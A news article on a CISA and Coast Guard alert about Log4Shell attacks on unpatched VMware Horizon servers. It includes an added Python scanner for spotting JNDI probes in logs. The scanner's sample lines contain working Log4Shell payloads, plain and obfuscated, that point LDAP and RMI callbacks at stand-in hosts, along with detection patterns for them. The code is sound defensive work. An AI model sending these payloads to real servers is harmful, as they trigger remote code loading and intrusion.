CISA and U.S. Coast Guard warn organizations of Log4Shell attacks
The Cybersecurity and Infrastructure Security Agency (CISA) and the U.S. Coast Guard Cyber Command (CGCYBER) are warning organizations that unpatched VMware Horizon and Unified Access Gateway (UAG) servers remain vulnerable to CVE-2021-44228, the Log4j flaw widely known as Log4Shell.
Government agencies say the vulnerability is being exploited by a range of threat actors, including state-backed groups.
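As an added practitioner check, not part of the CISA/CGCYBER alert or of this article, the Python below scans web-server log lines for the JNDI lookup string that triggers CVE-2021-44228. A plain grep for `${jndi:` misses probes that hide the string inside nested Log4j lookups (`${lower:j}`, `${upper:n}`, `${::-l}`, `${env:NaN:-j}`), so the scanner first collapses those lookups and only then matches. The log lines, IP addresses and callback URLs are constructed for the example, and the resolver is a simplified approximation of Log4j's lookup syntax, not the real implementation.

```python
import re

# Constructed sample access-log lines (not from the advisory): one benign
# request, one plain Log4Shell probe, and two probes obfuscated with nested
# Log4j lookups. Addresses are documentation ranges (RFC 5737).
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - [30/Jan/2022:10:12:01 +0000] "GET /portal/webclient/index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [30/Jan/2022:10:12:07 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.9:1389/a}"',
    '203.0.113.9 - - [30/Jan/2022:10:12:09 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "${${lower:j}${upper:n}di:${::-l}${::-d}ap://203.0.113.9:1389/b}"',
    '198.51.100.7 - - [30/Jan/2022:10:13:00 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "${${env:NaN:-j}ndi:rmi://198.51.100.7/x}"',
]

# Innermost lookup: a ${...} whose body contains no further "${" or "}".
LOOKUP_RE = re.compile(r"\$\{([^${}]*)\}")

# After deobfuscation the dangerous lookup is simply "${jndi:". Log4j matches
# the lookup prefix case-insensitively, so "${jNdi:" must match too.
JNDI_RE = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)

# Scheme and host of the attacker-controlled callback, e.g. ldap://host:1389/a.
CALLBACK_RE = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)://([^/:}\s]+)", re.IGNORECASE)


def _resolve_one(match: re.Match) -> str:
    """Resolve a single innermost lookup using a subset of Log4j's rules.

    Simplified approximation (assumption, not Log4j's code):
      ${x:name:-default} -> "default"   (the variable is treated as unset)
      ${lower:text}      -> text.lower()
      ${upper:text}      -> text.upper()
    Any other lookup (including jndi itself) is left in place.
    """
    body = match.group(1)
    if ":-" in body:
        return body.split(":-", 1)[1]
    prefix, sep, rest = body.partition(":")
    if sep and prefix.lower() == "lower":
        return rest.lower()
    if sep and prefix.lower() == "upper":
        return rest.upper()
    return match.group(0)


def deobfuscate(text: str, max_rounds: int = 20) -> str:
    """Collapse nested lookups from the inside out until nothing changes."""
    for _ in range(max_rounds):
        resolved = LOOKUP_RE.sub(_resolve_one, text)
        if resolved == text:
            break
        text = resolved
    return text


def is_log4shell_probe(line: str) -> bool:
    return bool(JNDI_RE.search(deobfuscate(line)))


def callback_targets(line: str) -> list[tuple[str, str]]:
    """Return (scheme, host) pairs the probe would make the server connect to."""
    return CALLBACK_RE.findall(deobfuscate(line))


def scan_log(lines: list[str]) -> list[tuple[int, str]]:
    """Return (1-based line number, deobfuscated line) for each suspicious line."""
    hits = []
    for number, line in enumerate(lines, 1):
        decoded = deobfuscate(line)
        if JNDI_RE.search(decoded):
            hits.append((number, decoded))
    return hits


if __name__ == "__main__":
    for number, decoded in scan_log(SAMPLE_LOG_LINES):
        print(f"line {number}: {callback_targets(decoded)}")
```

The callback host is the most useful artifact to pivot on: outbound LDAP or RMI connections from a Horizon server to that host are the confirmation that the lookup actually fired, not just that a probe arrived. The resolver deliberately treats every `${name:-default}` variable as unset; real Log4j would substitute an environment variable or system property if it existed, so a payload that depends on such a value could deobfuscate differently on the target than it does here.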
As part of this exploitation activity, suspected APT actors planted loader malware on compromised systems; the loaders carried embedded executables that could enable remote command and control.
In one confirmed breach, these APT actors were able to move laterally within the network, gain access to the disaster recovery network, and collect and exfiltrate sensitive data. In the second incident detailed in the alert, CISA said it conducted an on-site incident response engagement.
In that engagement, which began in late April and continued into May, CISA found that the organization's network had been compromised by multiple threat actor groups.
According to CISA, one of those groups had been in the organization's network since January, possibly even earlier.
CISA added that the group gained its initial access by exploiting Log4Shell on unpatched VMware Horizon servers.
Beginning January 30, one of the groups used PowerShell scripts and eventually moved laterally to other production hosts and servers.
The group was then able to use a compromised administrator account to run a loader malware.
“The loader malware appears to be a modified version of the SysInternals LogonSessions, Du, or PsPing software.
The embedded executable belongs to the same malware family, is similar in design and functionality to 658_dump_64.exe, and provides remote command and control ability.